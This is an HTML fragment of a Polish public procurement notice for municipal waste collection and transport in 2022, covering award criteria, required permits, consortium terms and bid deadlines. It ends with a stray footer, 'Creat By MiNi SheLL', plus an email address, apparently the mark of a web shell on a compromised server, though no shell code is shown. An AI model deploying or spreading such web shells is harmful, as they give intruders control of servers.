kod CPV: </h3> <p class="mb-0">90511000-2 - Usługi wywozu odpadów</p> <p class="mb-0">90512000-9 - Usługi transportu odpadów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający w zależności od potrzeb i środków finansowych, przewiduje udzielenie Wykonawcy, który realizuje zamówienie podstawowe, w okresie do 3 lat od dnia jego udzielenia, zamówienia polegającego na powtórzeniu podobnych usług, zgodnie z art. 214 ust.1 pkt.7 ustawy Pzp (Dz.U. z dnia 2021 poz.1129 ze zm.) przewiduje udzielenie zamówienia podobnego obejmującego podobną usługę. <br/>Przedmiot zamówienia wskazany jest w pkt. 2 Działu III SWZ.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Do porównania ofert Zamawiający przyjmuje ceny ofert brutto zawierające podatek VAT.<br/>2.	Zamawiający oceni i porówna jedynie te oferty, które nie zostaną odrzucone na podstawie art. 226 ust. 1 ustawy Pzp oraz na podstawie art. 296 ust. 2 ustawy Pzp, w przypadku podjęcia przez Zamawiającego decyzji o prowadzeniu negocjacji w celu ulepszenia treści ofert w ramach kryteriów oceny ofert (dotyczy oferty dodatkowej, która jest mniej korzystna w którymkolwiek z kryteriów oceny ofert wskazanych w zaproszeniu do negocjacji niż oferta złożona w odpowiedzi na ogłoszenie o zamówieniu).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dyspozycyjność</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą się ubiegać wykonawcy, którzy spełniają warunki udziału w postępowaniu, dotyczące uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów.<br/>Zamawiający uzna ww. warunek za spełniony, jeśli Wykonawca wykaże, że spełnia warunek posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli wykaże że;<br/>5.1. Wykonawca posiada aktualne zezwolenie na zbieranie odpadów lub zezwolenie na przetwarzanie odpadów – zezwolenie o którym mowa w art.27 ust.2 pkt. 1 ustawy o z dnia 14 grudnia 2012 o odpadach (Dz.U. z 2021r., poz. 779 z późn.zm), uwzględniając rodzaje odpadów o kodach wymienionych we wniosku.<br/>5.2. Wykonawca jest wpisany do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości – rejestr o którym mowa w art. 9b ustawy z dnia 13 września 1996r o utrzymaniu czystości i porządku w gminach (Dz. z 2021r. poz.888 z póź. zm.) <br/>5.3. Wykonawca jest wpisany do rejestru podmiotów wprowadzających produkty i produktu w opakowaniach, oferujących torby na zakupy objęte opłatą recyklingową i gospodarujących odpadami BDO prowadzonego przez Marszałka Województwa na podstawie art.49 ust.1 ustawy z dnia 14 grudnia 2012r. o odpadach. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga złożenia podmiotowych środków dowodowych w celu wykazania braku podstaw wykluczenia z postępowania, o którym mowa w Dziale VI pkt 2 SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wymaga złożenia nw. podmiotowych środków dowodowych (aktualnych na dzień ich złożenia) w celu wykazania spełniania warunków udziału w postępowaniu, dotyczących uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów, określonych w Dziale VI pkt 5 SWZ:<br/>2.1.	w celu wykazania spełniania warunku udziału w postępowaniu w zakresie uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów, Zamawiający wymaga od Wykonawcy złożenia, w odpowiedzi na wezwanie:<br/>2.1.1.	zezwolenie na zbieranie odpadów, o którym mowa w art. 41 ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2021 r. poz. 779 z późn. zm.), <br/>2.1.2.	wpis do rejestru działalności regulowanej, o której mowa w art. 9 b w zakresie ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminie (Dz. U. z 2021 r. poz. 888 z późn. zm.), który prowadzi wójt, burmistrz lub prezydent miasta właściwy ze względu na miejsce odbierania odpadów komunalnych od właścicieli nieruchomości, <br/>2.1.3. wpis do BDO - rejestru, o którym mowa w art. 49 ustawy z 14 grudnia 2012 o odpadach (Dz.U z 2021 poz.779) prowadzonego przez marszałka województwa prowadzonego przez Marszałka Województwa.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielnie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwa winny być załączone do oferty.<br/>1.1.	Dokument potwierdzający ustanowienie pełnomocnictwa powinien zawierać wskazanie postępowania o zamówienie publiczne, którego dotyczy, wykonawców ubiegających się wspólnie o udzielenie zamówienia, ustanowionego pełnomocnika oraz zakres jego umocowania. Podpisy muszą zostać złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub wpisie do ewidencji działalności gospodarczej. <br/>1.2.	Wszelka korespondencja kierowana będzie wyłącznie do podmiotu występującego jako pełnomocnik (lider konsorcjum).<br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenia zamówienia dołączają do oferty Oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy. (Wzór stanowi Załącznik nr 5 do SWZ).<br/>3.	Wykonawcy wspólnie ubiegający się o niniejsze zamówienie, których oferta zostanie uznana za najkorzystniejszą na trzy dni przed zawarciem umowy w sprawie zamówienia publicznego są zobowiązani przedstawić zamawiającemu stosowną umowę regulującą współpracę tych Wykonawców występujących wspólnie, zawierającą w swojej treści następujące postanowienia:<br/>3.1.	określenie celu gospodarczego,<br/>3.2.	oznaczenie czasu trwania konsorcjum, obejmującego okres realizacji przedmiotu zamówienia,<br/>3.3.	podział zadań pomiędzy poszczególnych Wykonawców występujących wspólnie, zgodny z Oświadczeniem, o którym mowa powyżej w pkt 2 niniejszego Działu.<br/>3.4.	wykluczenie możliwości wypowiedzenia umowy wspólnej przez któregokolwiek z Wykonawców występujących do czasu wykonania zamówienia w całości,<br/>3.5.	solidarną odpowiedzialność Wykonawców występujących wspólnie za realizację przedmiotu zamówienia,<br/>3.6.	solidarność Wykonawców jako wierzycieli względem wierzytelności, które będą im przysługiwały w związku z realizacją przedmiotu zamówienia w ramach zawartej z Zamawiającym Umowy;<br/>3.7.	określenie sposobu płatności wynagrodzenia przez Zamawiającego przysługującego Wykonawcom w związku z realizacją zamówienia, zgodnie z którym faktury na rzecz Zamawiającego będzie wystawiał Lider, który będzie się rozliczał wewnętrznie z drugim członkiem konsorcjum. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia określone zostały w par. 11 Istotnych projektowanych postanowieniach umowy - Załącznik nr 6 do SWZ oraz w Dziale XXIII SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-15 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">http://www.soldea.pl/epz/epz/indexpostepowaniazamawiajacy.php? s=3e47582343b49b9d9e1e4c6a3191075a65625218</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-15 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-13</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com